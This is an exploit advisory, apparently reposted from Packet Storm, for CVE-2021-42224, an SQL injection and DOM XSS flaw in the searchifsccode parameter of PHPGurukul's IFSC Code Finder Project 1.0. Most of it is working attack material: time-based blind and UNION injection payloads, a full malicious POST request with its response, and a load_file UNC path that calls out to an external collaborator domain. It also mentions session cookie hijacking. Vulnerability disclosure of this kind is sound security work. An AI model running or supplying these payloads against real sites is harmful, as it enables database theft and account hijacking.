Share
## https://sploitus.com/exploit?id=PACKETSTORM:164514
Hello, dear friends.  
  
KR  
  
## [CVE-2021-42224](https://phpgurukul.com/ifsc-code-finder-project-using-php/)  
## [Vendor](https://phpgurukul.com/author/admin/)  
![](https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-42224/docs/Screenshot%202021-10-14%20104403.png)  
  
## Description:  
- vulnerability: `all or nothing`  
  
SQL Injection vulnerability exists in IFSC Code Finder Project 1.0 via  
the searchifsccode POST parameter in /search.php.  
The searchifsccode parameter appears to be vulnerable to SQL injection  
attacks. The test payload '+(select  
load_file('\\\\bp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net\\ing'))+'  
was submitted in the searchifsccode parameter. This payload injects a  
SQL sub-query that calls MySQL's load_file function with a UNC file  
path that references a URL on an external domain. The application  
interacted with that domain, indicating that the injected SQL query  
was executed. Also the parameter "searchifsccode" from search.php is  
XSS-Dom vulnerable plus PHPSESSID hijacking.  
  
## SQL injection Types  
  
```mysql  
---  
Parameter: searchifsccode (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: searchifsccode=849487'+(select  
load_file('\\\\bp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net\\ing'))+'')  
AND (SELECT 1445 FROM (SELECT(SLEEP(5)))EBDq) AND  
('ubep'='ubep&search=%C2%9E%C3%A9e  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 2 columns  
Payload: searchifsccode=849487'+(select  
load_file('\\\\bp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net\\ing'))+'')  
UNION ALL SELECT  
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176766b71,0x624a5562647364654b616a684c6d546a427263576377794168415561525872414e53664d6a6e6444,0x7171786271),NULL--  
-&search=%C2%9E%C3%A9e  
---  
```  
## Mysql Request:  
  
```mysql  
POST /IFSC%20Code%20Finder%20Project%20Using%20PHP/ifscfinder/search.php  
HTTP/1.1  
Host: 192.168.1.180  
Origin: http://192.168.1.180  
Cookie: PHPSESSID=jmir9unlgf2inpr758uva4ruhb  
Upgrade-Insecure-Requests: 1  
Referer: http://192.168.1.180/IFSC%20Code%20Finder%20Project%20Using%20PHP/ifscfinder/  
Content-Type: application/x-www-form-urlencoded  
Accept-Encoding: gzip, deflate  
Accept: */*  
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61  
Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Content-Length: 42  
  
searchifsccode=849487'%2b(select%20load_file('%5c%5c%5c%5cbp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net%5c%5cing'))%2b'&search=%C2%9E%C3%A9e  
```  
  
## MySQL Response:  
  
```mysql  
HTTP/1.1 200 OK  
Date: Thu, 14 Oct 2021 07:02:37 GMT  
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24  
X-Powered-By: PHP/7.4.24  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Content-Length: 7797  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
<!doctype html>  
<html class="no-js" lang="en">  
  
<head>  
  
<!--====== Title ======-->  
<title>IFSC Code Finder Portal | Home</title>  
  
<!--====== Slick CSS ======-->  
<link  
...[SNIP]...  
```  
## Proof:  
[href](https://streamable.com/kqadhc)  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-mitre/edit/main/CVE-2021-42224)  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html and https://www.exploit-db.com/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>